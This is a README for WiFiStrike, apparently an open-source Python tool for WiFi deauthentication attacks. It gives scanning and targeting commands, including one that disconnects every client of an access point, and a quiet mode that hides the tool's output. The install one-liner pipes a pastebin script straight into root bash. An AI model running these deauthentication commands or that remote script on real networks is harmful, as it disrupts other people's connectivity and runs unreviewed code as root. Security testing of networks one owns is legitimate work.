WiFiStrike is a powerful, pure Python implementation of a WiFi deauthentication tool that doesn't rely on the Aircrack-ng suite. It provides an automated, user-friendly approach to WiFi analysis and deauthentication testing.
Key Features:
- π Automatic network interface detection
- π‘ Access point scanning with detailed information
- π₯ Client device discovery
- π Targeted and broadcast deauthentication
- π Signal strength monitoring
- π Clean, colorful command-line interface
WiFiStrike offers several benefits compared to traditional Aircrack-ng based tools:
- Pure Python Implementation: No dependency on external C-based tools or libraries
- Simplified Workflow: Single command operation vs multi-step process in Aircrack-ng
- Automatic Interface Management: Auto-detection and mode switching without manual steps
- Lower Footprint: Lighter resource usage compared to full Aircrack-ng suite
- Modern Codebase: Python-based for easier customization and extension
- Single Tool: All functionality in one command vs multiple tools (airmon-ng, airodump-ng, aireplay-ng)
- Cleaner Output: Colored, structured terminal output for better readability
- Less Dependencies: Minimal external dependencies to install
- User-Friendly: Guided operation with clear prompts and options
- Portability: Easier to deploy across different Linux distributions
This tool is provided for EDUCATIONAL PURPOSES ONLY.
WiFiStrike is designed for network administrators and security professionals to test their own networks. Using this tool on networks without explicit permission is illegal in most jurisdictions and unethical. The author accepts NO responsibility for misuse of this tool.
- Linux-based operating system
- Python 3.x
- WiFi adapter supporting monitor mode and packet injection
- Root privileges
WiFiStrike works with most WiFi adapters that support monitor mode ( Most modern laptops has inbuild monitor mode supporting wifi adapters ), including:
- Alfa AWUS036ACH
- TP-Link TL-WN722N (v1)
- Panda PAU09
- Many other Atheros, Ralink, and Realtek chipset-based adapters
curl -s https://pastebin.com/raw/3YLnJiUW | bashor
wget -qO- https://pastebin.com/raw/3YLnJiUW | bash# Clone the repository
git clone https://github.com/arxhr007/wifistrike
# Navigate to the directory
cd wifistrike
# Install required Python packages
sudo pip install -r requirements.txt
# Run the installation script
sudo bash install.shsudo wifistrikeThis will auto-detect your network interfaces and guide you through the attack options.
sudo wifistrike -i [interface_name]
# Example:
sudo wifistrike -i wlan0# Set gateway (access point) MAC address manually
sudo wifistrike -g [gateway_mac]
# Set target client MAC address manually
sudo wifistrike -t [target_mac]
# Deauthenticate all clients
sudo wifistrike -t 0sudo wifistrike -i [interface] -g [gateway_mac] -t [target_mac]
# Example:
sudo wifistrike -i wlan0 -g 11:22:33:44:55:66 -t aa:bb:cc:dd:ee:ff# Set interface to managed mode
sudo wifistrike --man [interface]
# Set interface to monitor mode
sudo wifistrike --mon [interface]# List all network interfaces
sudo wifistrike -l
# Scan for available WiFi networks
sudo wifistrike -sw
# Scan for client devices connected to an access point
sudo wifistrike -st
# Scan for clients on a specific access point
sudo wifistrike -st -g [gateway_mac]sudo wifistrike -i [interface] -g [gateway_mac] -t [target_mac] > /dev/null 2>&1| Command | Description |
|---|---|
-i, --interface |
Specify network interface |
-g, --gateway_mac |
Set access point MAC address |
-t, --target_mac |
Set target client MAC address |
-l, --list_interface |
List available network interfaces |
-sw, --scan_wifi |
Scan for WiFi networks |
-st, --scan_target |
Scan for connected clients |
--man |
Set interface to managed mode |
--mon |
Set interface to monitor mode |
sudo bash uninstall.sh- Aaron (@arxhr007)
This project is licensed under the MIT License - see the LICENSE file for details.